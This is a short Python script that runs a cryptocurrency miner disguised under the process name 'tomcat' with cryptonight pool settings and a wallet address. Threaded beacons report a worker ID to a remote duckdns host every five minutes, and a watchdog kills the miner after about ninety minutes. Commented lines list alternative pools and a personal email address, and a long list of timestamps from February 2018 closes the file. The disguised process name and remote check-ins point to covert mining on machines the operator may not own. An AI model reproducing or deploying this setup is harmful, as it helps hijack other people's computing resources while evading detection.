import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:05.275928
#2018-02-17 16:04:05.914985
#2018-02-17 17:54:03.818667
#2018-02-17 19:41:07.249935
#2018-02-17 21:29:03.822330
#2018-02-17 23:14:04.356844
#2018-02-18 01:00:09.048145
#2018-02-18 02:49:01.535917
#2018-02-18 04:39:04.124259
#2018-02-18 06:31:07.316311
#2018-02-18 08:19:03.632749
#2018-02-18 10:07:05.928519
#2018-02-18 11:53:01.510209
#2018-02-18 13:38:03.589360
#2018-02-18 15:28:01.904172
#2018-02-18 17:16:06.006966
#2018-02-18 19:03:06.958869
#2018-02-18 20:50:06.115271
#2018-02-18 22:36:03.463383
#2018-02-19 00:24:05.747400
#2018-02-19 02:10:09.705888
#2018-02-19 03:56:06.942977
#2018-02-19 05:40:04.836514
#2018-02-19 07:28:05.359251
#2018-02-19 09:17:06.697290
#2018-02-19 11:07:05.453913
#2018-02-19 12:54:01.666973
#2018-02-19 14:43:08.390217
#2018-02-19 16:32:06.648664
#2018-02-19 18:18:05.929587
#2018-02-19 20:06:08.327917
#2018-02-19 21:57:01.521134
#2018-02-19 23:42:04.657781
#2018-02-20 01:29:02.091586
#2018-02-20 03:18:02.018135
#2018-02-20 05:04:06.307963
#2018-02-20 06:47:01.599029
#2018-02-20 08:33:07.640859
#2018-02-20 10:17:07.939549
#2018-02-20 12:02:07.372486
#2018-02-20 13:48:15.447218
#2018-02-20 15:27:01.700442
#2018-02-20 17:12:02.202969
#2018-02-20 19:01:08.569415
#2018-02-20 20:50:05.951731
#2018-02-20 22:34:06.593638
#2018-02-21 00:15:07.382330
#2018-02-21 02:02:07.001115
#2018-02-21 03:51:07.173805
#2018-02-21 05:37:07.667639
#2018-02-21 07:26:04.976365
#2018-02-21 09:10:10.504226
#2018-02-21 10:58:08.696265
#2018-02-21 12:44:07.361497
#2018-02-21 14:33:09.271610
#2018-02-21 16:20:05.021410
#2018-02-21 18:09:07.455570
#2018-02-21 19:55:09.791252
#2018-02-21 21:41:08.066270
#2018-02-21 23:28:04.675034
#2018-02-22 01:16:07.261971
#2018-02-22 03:05:05.824804
#2018-02-22 04:49:08.352973
#2018-02-22 06:34:06.656917
#2018-02-22 08:22:04.008335
#2018-02-22 10:10:10.835368
#2018-02-22 11:54:07.904264
#2018-02-22 13:41:08.664776
#2018-02-22 15:30:08.791907
#2018-02-22 17:16:07.568429
#2018-02-22 19:02:08.824937
#2018-02-22 20:53:01.457589
#2018-02-22 22:39:02.163938
#2018-02-23 00:26:05.645228
#2018-02-23 02:13:04.030391
#2018-02-23 03:57:03.146457
#2018-02-23 05:45:07.645836
#2018-02-23 07:34:01.288523
#2018-02-23 09:37:04.487094
#2018-02-23 11:43:06.120275
#2018-02-23 13:32:08.315231
#2018-02-23 15:19:08.007970
#2018-02-23 17:07:04.675668
#2018-02-23 18:38:05.068839
#2018-02-23 20:19:05.696722
#2018-02-23 21:56:05.445414
#2018-02-23 23:31:07.436143
#2018-02-24 01:05:06.504589
#2018-02-24 02:45:01.436227
#2018-02-24 04:21:05.079319
#2018-02-24 05:49:06.314036
#2018-02-24 07:23:07.375519
#2018-02-24 08:57:01.228977
#2018-02-24 10:27:05.932787
#2018-02-24 12:11:02.202896
#2018-02-24 13:40:02.972960
#2018-02-24 15:11:01.742042
#2018-02-24 16:45:06.113712
#2018-02-24 18:19:06.431750
#2018-02-24 19:49:04.403956
#2018-02-24 20:03:07.248082
#2018-02-24 21:22:06.763881
#2018-02-24 23:42:03.796444
#2018-02-25 03:37:05.020805
#2018-02-25 07:15:05.437749